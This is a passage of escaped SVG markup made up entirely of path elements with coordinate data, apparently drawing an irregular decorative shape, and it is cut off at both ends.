d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n        <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n        <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n        <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n        <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n        <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n        <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n        <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n        <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n        <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n        <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n        <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n        <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n        <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n        <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n        <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n        <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n        <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n        <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n        <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n        <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n        <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n        <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n        <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n        <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n        <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n        <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n        <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n        <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n        <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n        <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n        <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n        <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n        <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n        <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n        <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n        <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n        <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n        <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n        <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n        <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n        <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n        <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n        <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n        <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n        <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n        <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n        <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n        <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n        <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n        <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n        <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n        <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n        <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n        <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n        <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n        <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n        <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n        <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n        <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n        <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n        <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n        <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n        <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n        <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n        <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n        <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n        <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n        <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n        <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n        <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n        <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n        <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n        <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n        <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n        <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n        <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n        <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n        <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n        <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n        <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n        <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n        <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n        <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n        <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n        <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n        <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n        <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n        <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n        <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n        <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n        <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n        <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n        <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n        <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n        <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n        <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n        <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n        <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n        <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n        <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n        <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.